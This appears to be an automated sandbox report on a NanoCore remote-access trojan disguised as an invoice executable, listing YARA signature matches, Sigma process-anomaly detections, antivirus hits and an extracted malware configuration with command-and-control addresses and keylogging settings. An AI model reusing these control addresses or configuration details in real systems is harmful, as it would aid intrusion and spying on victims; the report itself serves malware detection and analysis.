17.2.svchost.exe.4250b50.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x42fad:$x1: NanoCore.ClientPluginHost 0x75bcd:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x42fea:$x2: IClientNetworkHost 0x75c0a:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46b1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x7973d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
17.2.svchost.exe.4250b50.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
17.2.svchost.exe.4250b50.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42d15:$a: NanoCore 0x42d25:$a: NanoCore 0x42f59:$a: NanoCore 0x42f6d:$a: NanoCore 0x42fad:$a: NanoCore 0x75935:$a: NanoCore 0x75945:$a: NanoCore 0x75b79:$a: NanoCore 0x75b8d:$a: NanoCore 0x75bcd:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42d74:$b: ClientPlugin 0x42f76:$b: ClientPlugin 0x42fb6:$b: ClientPlugin
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
25.2.CasPol.exe.416b146.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d0af:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d0dc:$x2: IClientNetworkHost
25.2.CasPol.exe.416b146.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d0af:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e18a:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d0c9:$s5: IClientLoggingHost
25.2.CasPol.exe.416b146.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
25.2.CasPol.exe.416b146.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d065:$a: NanoCore 0x2d07a:$a: NanoCore 0x2d0af:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2ce21:$b: ClientPlugin 0x2ce3c:$b: ClientPlugin
25.2.CasPol.exe.5844629.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
25.2.CasPol.exe.5844629.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
25.2.CasPol.exe.5844629.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
25.2.CasPol.exe.5460000.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
25.2.CasPol.exe.5460000.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
17.2.svchost.exe.4283970.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
17.2.svchost.exe.4283970.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
17.2.svchost.exe.4283970.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
17.2.svchost.exe.4283970.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
25.2.CasPol.exe.5840000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
25.2.CasPol.exe.5840000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
25.2.CasPol.exe.5840000.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.svchost.exe.532d6f8.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.svchost.exe.532d6f8.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
22.2.svchost.exe.532d6f8.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.svchost.exe.532d6f8.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
17.2.svchost.exe.4250b50.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
17.2.svchost.exe.4250b50.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
17.2.svchost.exe.4250b50.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
17.2.svchost.exe.4250b50.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
25.2.CasPol.exe.416ff7c.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
25.2.CasPol.exe.416ff7c.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
25.2.CasPol.exe.416ff7c.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
25.2.CasPol.exe.416ff7c.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28279:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x282a6:$x2: IClientNetworkHost
25.2.CasPol.exe.416ff7c.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28279:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x29354:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x28293:$s5: IClientLoggingHost
25.2.CasPol.exe.416ff7c.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
25.2.CasPol.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
25.2.CasPol.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
25.2.CasPol.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
25.2.CasPol.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x42dad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x42dea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4691d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x42b25:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x42dad:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x443e6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x443da:$s2: FileCommand 0x1266b:$s3: PipeExists 0x4528b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x4b042:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost 0x42dd7:$s5: IClientLoggingHost
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42b15:$a: NanoCore 0x42b25:$a: NanoCore 0x42d59:$a: NanoCore 0x42d6d:$a: NanoCore 0x42dad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42b74:$b: ClientPlugin 0x42d76:$b: ClientPlugin 0x42db6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x42c9b:$c: ProjectData 0x10a82:$d: DESCrypto 0x436a2:$d: DESCrypto 0x1844e:$e: KeepAlive
17.2.svchost.exe.4283970.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x42dad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x42dea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4691d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
17.2.svchost.exe.4283970.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
17.2.svchost.exe.4283970.7.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42b15:$a: NanoCore 0x42b25:$a: NanoCore 0x42d59:$a: NanoCore 0x42d6d:$a: NanoCore 0x42dad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42b74:$b: ClientPlugin 0x42d76:$b: ClientPlugin 0x42db6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x42c9b:$c: ProjectData 0x10a82:$d: DESCrypto 0x436a2:$d: DESCrypto 0x1844e:$e: KeepAlive
Click to see the 61 entries

Sigma Overview

System Summary:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 6880, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, NewProcessName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, OriginalFileName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 7060, ProcessCommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , ProcessId: 6140

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Sigma detected: System File Execution Location Anomaly

Show sources

Source: Process started

Author: Florian Roth, Patrick Bareiss: Data: Command: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, NewProcessName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, OriginalFileName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 7060, ProcessCommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , ProcessId: 6140

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, NewProcessName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, OriginalFileName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 7060, ProcessCommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , ProcessId: 6140

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "5c958888-f81c-42a4-939d-31983a2cd9ba", "Group": "wuzzy122", "Domain1": "185.157.160.233", "Domain2": "annapro.linkpc.net", "Port": 2212, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe

ReversingLabs: Detection: 27%

Multi AV Scanner detection for submitted file

Show sources

Source: CN-Invoice-XXXXX9808-19011143287989.exe

ReversingLabs: Detection: 27%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.948080441.0000000003121000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6140, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3524, type: MEMORY
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.5840000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.41745a5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.5844629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.5840000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.416ff7c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.416ff7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Joe Sandbox ML: detected

Source: 25.2.CasPol.exe.5840000.9.unpack

Avira: Label: TR/NanoCore.fadte

Compliance:

Uses 32bit PE files

Show sources

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: \??\C:\Windows\mscorlib.pdb( source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900110608.0000000001603000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968712538.0000000006143000.00000004.00000001.sdmp
Source:	Binary string: .pdb> source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InprocHandler32 source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
Source:	Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, AdvancedRun.exe, 00000007.00000000.684807713.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000008.00000000.689085793.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp
Source:	Binary string: npMiVisualBasic.pdbT]_ source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
Source:	Binary string: CN-Invoice-XXXXX9808-19011143287989.PDB source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968712538.0000000006143000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968675958.0000000006138000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
